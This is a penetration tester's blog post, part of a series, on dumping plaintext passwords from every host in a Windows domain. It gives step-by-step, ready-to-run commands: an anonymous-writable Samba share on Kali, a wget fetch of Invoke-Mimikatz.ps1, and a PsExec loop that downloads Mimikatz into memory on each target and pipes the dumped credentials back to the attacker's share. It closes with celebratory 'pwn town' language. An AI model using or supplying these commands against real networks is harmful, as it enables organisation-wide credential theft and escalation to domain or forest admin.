Dumping a Domain’s Worth of Passwords with Mimikatz Part 3

By Russel Van Tuyl

Before you go any farther into this post, please note this entire attack depends on already having obtained a shared local admin or domain admin credentials. If you only have a shared local admin password, this can land you domain admin credentials. In my case, I already had domain admin credentials, this attack landed me forest admin creds.

This method rides on the coat tails of the work done by @JosephBialek, @mubix, @harmj0y, and @gentilkiwi. I was having trouble getting Veil PowerTool’s Invoke-MassMimikatz PowerShell script working, likely to keyboard actuator problems. I also didn’t want to go changing my registry settings or install a new program to do a mass Mimikatz attack. This post details the path that I chose to use for collecting creds from a network using Mimikatz.

This post will walk through how I used Sysinternals PSExec, PowerShell, Python, Invoke-Mimikatz.ps1, and a SMB share to gather plain-text passwords en masse across an organization. I wanted to do so in memory, to prevent from uploading and executing binaries on the target hosts. Having previously obtained a valid domain admin account, I used PSExec to launch a PowerShell instance on a target. Once launched, PowerShell downloads the Invoke-Mimikatz.ps1 script and executes it, all in memory. The output from Invoke-Mimikatz.ps1 is then piped to a network file share for later retrieval. I then wrote a Python script that will parse all the files in the directory and provide a nice unique list of usernames and passwords.

The Setup

First you’ll need to setup a network share that anyone can write files to. You can do this in Windows or Linux. I used a Kali host to setup the SMB file share. To do so, create a folder on your Kali host that will be used to store the Invoke-Mimikatz.ps1 and its output files. Don’t forget to set the folder permissions as well.

mkdir /root/mimikatz
chmod 703 /root/mimikatz

Open /etc/samba/smb.conf and place this text at the end of the file:

/[data]
path = /root/mimikatz
browseable = no
writable = yes
guest ok = yes

Start the SMB file server:

service samba restart

Now that the SMB file share is setup, let’s get a copy of the Invoke-Mimikatz.ps1 script and place it in our SMB file share. The Invoke-Mimikatz.ps1 PowerShell script can be found in both PowerSploit and Veil Framework’s Veil-Pillage. If you already have either of those tools installed, copy the Invoke-Mimikatz.ps1 to the SMB share at /root/mimikatz. If you don’t have a copy of the Invoke-Mimikatz.ps1 script on your Kali host, download it with wget to your SMB file share.

wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 -P /root/mimikatz

Next up, we need to prepare our PSExec statement. First you’ll need to generate a file containing a list of target hostnames or IPs that have TCP port 445 open. This can be accomplished by using NMap to scan the network for port 445/tcp. My PSExec statement looked like this:

C:\PsExec.exe \\$h -d -e -u ACME\bob -p P@$$word1 -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\172.16.1.205\data\Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}”
Let’s break this down:

The \\$h is a PowerShell variable that we will define later in a FOR loop. The variable represents the target host.

The –d flag is used to “Don’t wait for process to terminate (non-interactive)” If this flag is absent, you will need to press enter on your keyboard every time Invoke-Mimikatz.ps1 runs on a single target to continue on.

The –e flag “Does not load the specified account’s profile”. We don’t need to load the domain admin’s account profile on every box.

The –u and –p flags are used to specify the username and password of the domain administrator account. The ACME\ portion reflects the domain associated with the user name. If a shared local administrator account is being using, omit this portion so that just bob follows the –u flag.

The –s flag says to “Run the remote process in the System account”. This is important because Mimikatz needs to be run as SYSTEM to execute properly

cmd /c powershell launches cmd.exe on the target host which turns around and launches powershell. When powershell runs, it will execute the code following the –command flag.

IEX ((new-object net.webclient).downloadstring(‘\\172.16.1.205\data\Invoke-Mimikatz.ps1′)) . This will download the Invoke-Mimikatz.ps1 file from our SMB file share (the one we stood up earlier).

Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}. This will execute the Invoke-Mimikatz script and then pipe the output to our SMB file share on our Kali box.

%COMPUTERNAME% is a Windows environment variable of the target’s hostname and will result in a file created on the SMB share like “BOB-LAPTOP.txt”

PSExec has a built in iterator using the @ flag. I was having trouble getting the @ iterator to work from a PowerShell terminal so I opted to use a PowerShell FOR loop. I could have used the @ iterator from a normal CMD.exe terminal, but I was having trouble with the %COMPUTERNAME% variable being interpreted on my local machine.

Execution

Open up an elevated PowerShell prompt and enter the one line command shown below. Make sure the file paths are adjusted to match your locations. Alternatively, psexec.py from Core Labs’s Impacket could potentially be used to conduct this attack entirely from a Linux host.

ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p P@$$word1 -s cmd /c powershell -nop -command “& {IEX ((new-object net.webclient).downloadstring(‘\\172.16.1.205\data\Invoke-Mimikatz.ps1′));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}”}

After executing the prepared PSExec statement in a PowerShell, just sit back and watch as the text files start raining in on your SMB file share. The text files will look similar to this:

PSExec

Profit

It would be very time consuming to read through each of the recovered text files, find the user’s account name, domain, and plain-text password…..one by one. Therefore, I wrote a python script to parse all the files in a given directory and then output the recovered credentials to the screen. The script can be retrieved from our github repository at https://bitbucket.org/swordshieldsec/parsers/src. I couldn’t quite nail down handling the UTF-16-LE encoding of the Invoke-Mimikatz output files while in python. Because of that, I had to use unix2dos to convert the encoding something I could work with. Run this command to convert them:

for i in $(ls /root/mimikatz);do unix2dos $i;done

Now we can use the parse_Invoke-Mimikatz.py script to parse all of the files, aggregate the accounts, and print them to the screen. You can use the –F flag to specify a single file or the –D flag to specify a directory. python parse_Invoke-Mimikatz.py –help will print the usage statement. Now it’s time to run the script, do your pwn dance, and party on the network with your new found creds. Have fun at pwn town!

pwntown

 

Additional Resources:

http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/

 


RusselVanTuyl BW circular small

Russel Van Tuyl is a security analyst for Sword & Shield Enterprise Security. His primary role is conducting network vulnerability assessments and penetration tests but also performs web application assessments, firewall configuration audits, wireless assessments, and social engineering.

He has more than 10 years of experience in the technical field in roles such as database design, field device support, help desk, IT asset management, programming, and information security.

 

 


Comments are closed.